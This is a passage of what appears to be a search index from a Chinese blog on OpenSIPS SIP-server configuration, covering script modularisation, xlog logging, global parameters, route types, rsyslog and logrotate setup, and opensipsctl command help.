include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg\n","permalink":"https://wdd.js.org/opensips/ch5/module/","summary":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg","title":"脚本路由模块化"},{"content":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","permalink":"https://wdd.js.org/opensips/ch5/xlog/","summary":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","title":"优雅的使用xlog输出日志行"},{"content":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 listen:ws:172.16.200.228:5062 ","permalink":"https://wdd.js.org/opensips/ch5/global-params/","summary":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 listen:ws:172.16.200.228:5062 ","title":"全局参数配置"},{"content":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是的可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","permalink":"https://wdd.js.org/opensips/ch5/function/","summary":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是的可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","title":"函数特点"},{"content":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。\n请求路由 请求路由因为受到从外部网络来的请求而触发。\n# 主路由 route { ...... if (is_method(\u0026#34;INVITE\u0026#34;)) { route(check_hdrs,1); # 调用子路由check_hdrs,1是传递给子路由的参数 if ($rc\u0026lt;0) # 使用$rc获取上个子路由的处理结果 exit; } } # sub-route route[check_hdrs] { if (!is_present_hf(\u0026#34;Content-Type\u0026#34;)) return(-1); if ( $param(1)==1 \u0026amp;\u0026amp; !has_body() ) # 子路由使用$param(1), 获取传递的第一个参数 return(-2); # 使用return() 返回子路由的处理结果 return(1); } $rc和$retcode都可以获取子路由的返回结果。\n请求路由是必须的一个路由,所有从网络过来的请求,都会经过请求路由。\n在请求路由中,可以做三个动作\n给出响应 向前传递 丢弃这个请求 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是丢弃这个请求 分支路由 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是发出这个请求 t_on_branch并不是立即执行分支路由,而是注册分支路由的处理事件 注意所有**t_on_**开头的函数都是注册钩子,而不是立即执行。注册钩子可以理解为不是现在执行,而是未来某个时间会被触发执行。 分支路由只能用来触发一次,多次触发将会重写 你可以在这个路由中修改sip request url, 但是不能执行reply等信令方面的操作 route{ ... t_on_branch(\u0026#34;nat_filter\u0026#34;) ... } branch_route[nat_filter]{ } 失败的路由 当收到大于等于300的响应时触发失败路由 route{ ... t_on_failure(\u0026#34;vm_redirect\u0026#34;) ... } failure_route[vm_redirects]{ } 响应路由 当收到响应时触发,包括1xx-6xx的所有响应。\n响应路由分为两类\n全局响应路由,即不带名称的onreply_route{}, 自动触发,在带名响应路由前执行。 带名称的响应路由,即onreplay_route[some_name]{},需要用t_on_reply()方法来设置触发。 route{ t_on_reply(\u0026#34;inspect_reply\u0026#34;); } onreply_route{ xlog(\u0026#34;$rm/$rs/$si/$ci: global onreply route\u0026#34;); } onreply_route[inspect_reply]{ if ( t_check_status(\u0026#34;1[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;provisional reply $T_reply_code received\\n\u0026#34;); } if ( t_check_status(\u0026#34;2[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;successful reply $T_reply_code received\\n\u0026#34;); remove_hf(\u0026#34;User-Agent\u0026#34;); } else { xlog(\u0026#34;non-2xx reply $T_reply_code received\\n\u0026#34;); } } 本地路由 有些请求是opensips自己发的,这时候触发本地路由。使用场景:在多人会议时,opensips可以给多人发送bye消息。\nlocal_route { } 启动路由 可以让你在opensips启动时做些初始化操作\n注意启动路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\nstartup_route { } 计时器路由 在指定的周期,触发路由。可以用来更新本地缓存。\n注意计时器路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\n如:每隔120秒,做个事情\ntimer_route[gw_update, 120] { # update the local cache if signalized if ($shv(reload) == 1 ) { avp_db_query(\u0026#34;select gwlist from routing where id=10\u0026#34;, \u0026#34;$avp(list)\u0026#34;); cache_store(\u0026#34;local\u0026#34;,\u0026#34;gwlist10\u0026#34;,\u0026#34; $avp(list)\u0026#34;); } } 事件路由 当收到某些事件是触发,例如日志,数据库操作,数据更新,某些\n在事件路由的内部,可以使用$param(key)的方式获取事件的某些属性。\nxlog(\u0026#34;first parameters is $param(1)\\n\u0026#34;); # 根据序号 xlog(\u0026#34;Pike Blocking IP is $param(ip)\\n\u0026#34;); # 根据key event_route[E_DISPATCHER_STATUS] { } event_route[E_PIKE_BLOCKED] { xlog(\u0026#34;IP $param(ip) has been blocked\\n\u0026#34;); } 更多可以参考: https://opensips.org/html/docs/modules/devel/event_route.html\n错误路由 用来捕获运行时错误,例如解析sip消息出错。\nerror_route { xlog(\u0026#34;$rm from $si:$sp - error level=$(err.level), info=$(err.info)\\n\u0026#34;); sl_send_reply(\u0026#34;$err.rcode\u0026#34;, \u0026#34;$err.rreason\u0026#34;); exit; } ","permalink":"https://wdd.js.org/opensips/ch5/routing-type/","summary":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。","title":"路由分类"},{"content":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务\n*/10 * * * * /usr/sbin/logrotate /etc/logrotate.d/opensips ","permalink":"https://wdd.js.org/opensips/ch3/log/","summary":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务","title":"设置独立日志文件"},{"content":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.0.0.10\u0026#34;; t_relay(); } } 脚本一般由三个部分组成:\n全局参数配置 模块加载与参数配置 路由逻辑 全局参数配置 debug=2 # log level 2 (NOTICE) debug值越大,日志越详细 log_stderror=0 #log to syslog log_facility=LOG_LOCAL0 log_name=\u0026#34;sbc\u0026#34; listen=udp:127.0.0.1:5060 listen=tcp:192.168.1.5:5060 as 10.10.1.10:5060 listen=tls:192.168.1.5:5061 advertised_address=7.7.7.7 #global option, for all listeners 模块加载与参数配置 按照绝对路径加载模块\nloadmodules \u0026#34;/lib/opensips/modules/rr.so\u0026#34; loadmodules \u0026#34;/lib/opensips/modules/tm.so\u0026#34; 统一前缀加载模块\nmpath=\u0026#34;/lib/opensips/modules/\u0026#34; loadmodules \u0026#34;rr.so\u0026#34; loadmodules \u0026#34;tm.so\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch5/routing-script/","summary":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.","title":"配置文件"},{"content":"可以使用一下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 如果有问题,会提示那行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分好了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwdd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap ............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .............................. start OpenSIPS stop ............................... stop OpenSIPS -- command \u0026#39;acl\u0026#39; - manage access control lists (acl) acl show [\u0026lt;username\u0026gt;] .............. show user membership acl grant \u0026lt;username\u0026gt; \u0026lt;group\u0026gt; ....... grant user membership (*) acl revoke \u0026lt;username\u0026gt; [\u0026lt;group\u0026gt;] .... grant user membership(s) (*) -- command \u0026#39;cr\u0026#39; - manage carrierroute tables cr show ....................................................... show tables cr reload ..................................................... reload tables cr dump ....................................................... show in memory tables cr addrt \u0026lt;routing_tree_id\u0026gt; \u0026lt;routing_tree\u0026gt; ..................... add a tree cr rmrt \u0026lt;routing_tree\u0026gt; ....................................... rm a tree cr addcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;rewrite_host\u0026gt; ................ \u0026lt;prob\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;rewrite_prefix\u0026gt; \u0026lt;rewrite_suffix\u0026gt; ............... \u0026lt;flags\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;comment\u0026gt; .........................add a carrier (prob, strip, rewrite_prefix, rewrite_suffix,................... flags, mask and comment are optional arguments) ............... cr rmcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; ................ rm a carrier -- command \u0026#39;rpid\u0026#39; - manage Remote-Party-ID (RPID) rpid add \u0026lt;username\u0026gt; \u0026lt;rpid\u0026gt; ......... add rpid for a user (*) rpid rm \u0026lt;username\u0026gt; ................. set rpid to NULL for a user (*) rpid show \u0026lt;username\u0026gt; ............... show rpid of a user -- command \u0026#39;add|passwd|rm\u0026#39; - manage subscribers add \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; .......... add a new subscriber (*) passwd \u0026lt;username\u0026gt; \u0026lt;passwd\u0026gt; ......... change user\u0026#39;s password (*) rm \u0026lt;username\u0026gt; ...................... delete a user (*) -- command \u0026#39;add|dump|reload|rm|show\u0026#39; - manage address address show ...................... show db content address dump ...................... show cache content address reload .................... reload db table into cache address add \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; \u0026lt;proto\u0026gt; [\u0026lt;context_info\u0026gt;] [\u0026lt;pattern\u0026gt;] ....................... add a new entry ....................... (from_pattern and tag are optional arguments) address rm \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; ............... remove all entries ....................... for the given grp ip mask port -- command \u0026#39;dr\u0026#39; - manage dynamic routing * Examples: dr addgw \u0026#39;1\u0026#39; 10 \u0026#39;192.168.2.2\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW001\u0026#39; 0 \u0026#39;first_gw\u0026#39; * dr addgw \u0026#39;2\u0026#39; 20 \u0026#39;192.168.2.3\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW002\u0026#39; 0 \u0026#39;second_gw\u0026#39; * dr rmgw 2 * dr addgrp \u0026#39;alice\u0026#39; \u0026#39;example.com\u0026#39; 10 \u0026#39;first group\u0026#39; * dr rmgrp 1 * dr addcr \u0026#39;cr_1\u0026#39; \u0026#39;10\u0026#39; 0 \u0026#39;CARRIER_1\u0026#39; \u0026#39;first_carrier\u0026#39; * dr rmcr 1 * dr addrule \u0026#39;10,20\u0026#39; \u0026#39;+1\u0026#39; \u0026#39;20040101T083000\u0026#39; 0 0 \u0026#39;1,2\u0026#39; \u0026#39;NA_RULE\u0026#39; \u0026#39;NA routing\u0026#39; * dr rmrule 1 dr show ............................ show dr tables dr addgw \u0026lt;gwid\u0026gt; \u0026lt;type\u0026gt; \u0026lt;address\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;pri_prefix\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;probe_mode\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway dr rmgw \u0026lt;id\u0026gt; ....................... delete gateway dr addgrp \u0026lt;username\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;groupid\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway group dr rmgrp \u0026lt;id\u0026gt; ...................... delete gateway group dr addcr \u0026lt;carrierid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;flags\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ........................... add carrier dr rmcr \u0026lt;id\u0026gt; ....................... delete carrier dr addrule \u0026lt;groupid\u0026gt; \u0026lt;prefix\u0026gt; \u0026lt;timerec\u0026gt; \u0026lt;priority\u0026gt; \u0026lt;routeid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ................................. add rule dr rmrule \u0026lt;ruleid\u0026gt; ................. delete rule dr reload .......................... reload dr tables dr gw_status ....................... show gateway status dr carrier_status .................. show carrier status -- command \u0026#39;dispatcher\u0026#39; - manage dispatcher * Examples: dispatcher addgw 1 sip:1.2.3.1:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og1\u0026#39; \u0026#39;Outbound Gateway1\u0026#39; * dispatcher addgw 2 sip:1.2.3.4:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og2\u0026#39; \u0026#39;Outbound Gateway2\u0026#39; * dispatcher rmgw 4 dispatcher show ..................... show dispatcher gateways dispatcher reload ................... reload dispatcher gateways dispatcher dump ..................... show in memory dispatcher gateways dispatcher addgw \u0026lt;setid\u0026gt; \u0026lt;destination\u0026gt; \u0026lt;socket\u0026gt; \u0026lt;state\u0026gt; \u0026lt;weight\u0026gt; \u0026lt;attrs\u0026gt; [description] .......................... add gateway dispatcher rmgw \u0026lt;id\u0026gt; ................ delete gateway -- command \u0026#39;registrant\u0026#39; - manage registrants * Examples: registrant add sip:opensips.org \u0026#39;\u0026#39; sip:user@opensips.org \u0026#39;\u0026#39; user password sip:user@localhost \u0026#39;\u0026#39; 3600 \u0026#39;\u0026#39; registrant show ......................... show registrant table registrant dump ......................... show registrant status registrant add \u0026lt;registrar\u0026gt; \u0026lt;proxy\u0026gt; \u0026lt;aor\u0026gt; \u0026lt;third_party_registrant\u0026gt; \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; \u0026lt;binding_URI\u0026gt; \u0026lt;binding_params\u0026gt; \u0026lt;expiry\u0026gt; \u0026lt;forced_socket\u0026gt; . add a registrant registrant rm ........................... removes the entire registrant table registrant rmaor \u0026lt;id\u0026gt; ................... removes the gived aor id -- command \u0026#39;db\u0026#39; - database operations db exec \u0026lt;query\u0026gt; ..................... execute SQL query db roexec \u0026lt;roquery\u0026gt; ................. execute read-only SQL query db run \u0026lt;id\u0026gt; ......................... execute SQL query from $id variable db rorun \u0026lt;id\u0026gt; ....................... execute read-only SQL query from $id variable db show \u0026lt;table\u0026gt; ..................... display table content -- command \u0026#39;speeddial\u0026#39; - manage speed dials (short numbers) speeddial show \u0026lt;speeddial-id\u0026gt; ....... show speeddial details speeddial list \u0026lt;sip-id\u0026gt; ............. list speeddial for uri speeddial add \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; \u0026lt;new-uri\u0026gt; [\u0026lt;desc\u0026gt;] ... ........................... add a speedial (*) speeddial rm \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; ....... remove a speeddial (*) speeddial help ...................... help message - \u0026lt;speeddial-id\u0026gt;, \u0026lt;sd-id\u0026gt; must be an AoR (username@domain) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;new-uri\u0026gt; must be a SIP AoR (sip:username@domain) - \u0026lt;desc\u0026gt; a description for speeddial -- command \u0026#39;avp\u0026#39; - manage AVPs avp list [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... list AVPs avp add [-T table] \u0026lt;sip-id|uuid\u0026gt; \u0026lt;attribute\u0026gt; \u0026lt;type\u0026gt; \u0026lt;value\u0026gt; ............ add AVP (*) avp rm [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... remove AVP (*) avp help .................................. help message - -T - table name - -u - SIP id or unique id - -a - AVP name - -v - AVP value - -t - AVP name and type (0 (str:str), 1 (str:int), 2 (int:str), 3 (int:int)) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;uuid\u0026gt; must be a string but not AoR -- command \u0026#39;alias_db\u0026#39; - manage database aliases alias_db show \u0026lt;alias\u0026gt; .............. show alias details alias_db list \u0026lt;sip-id\u0026gt; ............. list aliases for uri alias_db add \u0026lt;alias\u0026gt; \u0026lt;sip-id\u0026gt; ...... add an alias (*) alias_db rm \u0026lt;alias\u0026gt; ................ remove an alias (*) alias_db help ...................... help message - \u0026lt;alias\u0026gt; must be an AoR (username@domain)\u0026#34; - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain)\u0026#34; -- command \u0026#39;domain\u0026#39; - manage local domains domain reload ....................... reload domains from disk domain show ......................... show current domains in memory domain showdb ....................... show domains in the database domain add \u0026lt;domain\u0026gt; ................. add the domain to the database domain rm \u0026lt;domain\u0026gt; .................. delete the domain from the database -- command \u0026#39;cisco_restart\u0026#39; - restart CISCO phone (NOTIFY) cisco_restart \u0026lt;uri\u0026gt; ................ restart phone configured for \u0026lt;uri\u0026gt; -- command \u0026#39;online\u0026#39; - dump online users from memory online ............................. display online users -- command \u0026#39;monitor\u0026#39; - show internal status monitor ............................ show server\u0026#39;s internal status -- command \u0026#39;ping\u0026#39; - ping a SIP URI (OPTIONS) ping \u0026lt;uri\u0026gt; ......................... ping \u0026lt;uri\u0026gt; with SIP OPTIONS -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry -- command \u0026#39;fifo\u0026#39; fifo ............................... send raw FIFO command ➜ ~ opopensipsctl ul /bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) ERROR: usrloc - too few parameters -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add 